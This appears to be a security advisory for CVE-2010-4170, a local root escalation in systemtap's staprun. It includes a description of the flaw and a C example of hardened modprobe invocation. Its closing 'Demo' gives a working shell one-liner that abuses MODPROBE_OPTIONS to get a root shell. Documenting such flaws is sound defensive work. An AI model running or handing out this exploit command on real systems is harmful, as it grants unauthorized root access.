Description: CVE-2010-4170 systemtap Local Root Privilege Escalation Vulnerability
Timeline:
Vulnerability reported to vendors by Tavis Ormandy on 2010-11-15
Vulnerability corrected by vendors around 2010-11-17
Provided by:
Tavis Ormandy
Reference(s):
CVE-2010-4170
Affected versions:
Red Hat, Fedora, Debian, Ubuntu, etc.
Tested on Debian squeeze/sid with:
systemtap-runtime_1.0-2_i386.deb
Description:
It was discovered that staprun did not properly sanitize the environment before executing the modprobe command to load an additional kernel module. A local, unprivileged user could use this flaw to escalate their privileges.
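The flaw described above comes down to a setuid helper letting its caller's environment (here MODPROBE_OPTIONS) reach modprobe. The following is an added example of the hardened pattern a reviewer would expect in such a helper, written for this page; it is not staprun's code and not the vendors' fix. The PATH value, the /sbin/modprobe location and the module-name character set are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Fixed environment for the privileged child. Nothing from the caller's
 * environment is inherited, so a user-supplied MODPROBE_OPTIONS (or PATH)
 * cannot steer modprobe. The PATH value is an assumed, hypothetical one. */
static char *const SAFE_ENV[] = {
    "PATH=/sbin:/bin:/usr/sbin:/usr/bin",
    NULL
};

/* Would variable 'name' be visible to the child? Testable without forking. */
int child_env_has(const char *name) {
    size_t n = strlen(name);
    for (int i = 0; SAFE_ENV[i] != NULL; i++)
        if (strncmp(SAFE_ENV[i], name, n) == 0 && SAFE_ENV[i][n] == '=')
            return 1;
    return 0;
}

/* Module names the helper accepts: [A-Za-z0-9_-] and no leading '-', so a
 * name cannot turn into a path or an option to modprobe. */
int module_name_ok(const char *name) {
    if (name == NULL || *name == '\0' || *name == '-') return 0;
    for (const char *p = name; *p; p++)
        if (!((*p >= 'a' && *p <= 'z') || (*p >= 'A' && *p <= 'Z') ||
              (*p >= '0' && *p <= '9') || *p == '_' || *p == '-'))
            return 0;
    return 1;
}

/* Hardened load: validated name, absolute path, argv built from fixed
 * strings, and an explicit envp instead of the inherited environ.
 * (The vulnerable pattern is system("modprobe ...") with the caller's
 * full environment.) Returns modprobe's exit status, or -1 on error. */
int load_module_safe(const char *module) {
    if (!module_name_ok(module)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "modprobe", (char *)module, NULL };
        execve("/sbin/modprobe", argv, SAFE_ENV);   /* assumed location */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```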
Demo:
Requires the "systemtap-runtime" package on Debian:
id
printf "install uprobes /bin/sh" exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever
id
Owned